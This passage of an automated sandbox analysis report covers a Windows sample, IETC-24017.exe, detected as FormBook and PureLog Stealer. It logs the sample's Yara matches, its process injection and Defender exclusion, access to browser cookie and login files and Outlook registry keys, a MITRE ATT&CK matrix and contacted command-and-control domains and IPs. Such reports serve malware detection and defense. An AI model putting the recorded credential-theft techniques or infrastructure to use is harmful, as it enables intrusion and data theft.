                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.371e790.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.6d90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1686417175.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.IETC-24017.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124676785.0000000004740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4130326224.0000000007C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1822234803.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4124625092.00000000046F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4124804278.0000000004D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1824149461.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.371e790.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.6d90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1686417175.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		312
                      Process Injection                      		11
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562159 Sample: IETC-24017.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 34 www.izmirescortg.xyz 2->34 36 www.amayavp.xyz 2->36 38 15 other IPs or domains 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->48 50 Multi AV Scanner detection for submitted file 2->50 54 8 other signatures 2->54 10 IETC-24017.exe 4 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 36->52 process4 file5 32 C:\Users\user\AppData\...\IETC-24017.exe.log, ASCII 10->32 dropped 58 Adds a directory exclusion to Windows Defender 10->58 60 Injects a PE file into a foreign processes 10->60 14 IETC-24017.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 70 Maps a DLL or memory area into another process 14->70 19 UFUUPGsATdE.exe 14->19 injected 72 Loading BitLocker PowerShell Module 17->72 23 WmiPrvSE.exe 17->23         started        25 conhost.exe 17->25         started        process9 dnsIp10 40 www.amayavp.xyz 185.27.134.144, 49742, 49743, 49744 WILDCARD-ASWildcardUKLimitedGB United Kingdom 19->40 42 www.canadavinreport.site 185.27.134.206, 50044, 50045, 50046 WILDCARD-ASWildcardUKLimitedGB United Kingdom 19->42 44 12 other IPs or domains 19->44 56 Found direct / indirect Syscall (likely to bypass EDR) 19->56 27 openfiles.exe 13 19->27         started        signatures11 process12 signatures13 62 Tries to steal Mail credentials (via file / registry access) 27->62 64 Tries to harvest and steal browser information (history, passwords, etc) 27->64 66 Modifies the context of a thread in another process (thread injection) 27->66 68 2 other signatures 27->68 30 firefox.exe 27->30         started        process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      IETC-24017.exe42%ReversingLabsByteCode-MSIL.Trojan.Genie
                      IETC-24017.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://pepabo.com/0%Avira URL Cloudsafe
                      http://www.cssa.auction0%Avira URL Cloudsafe
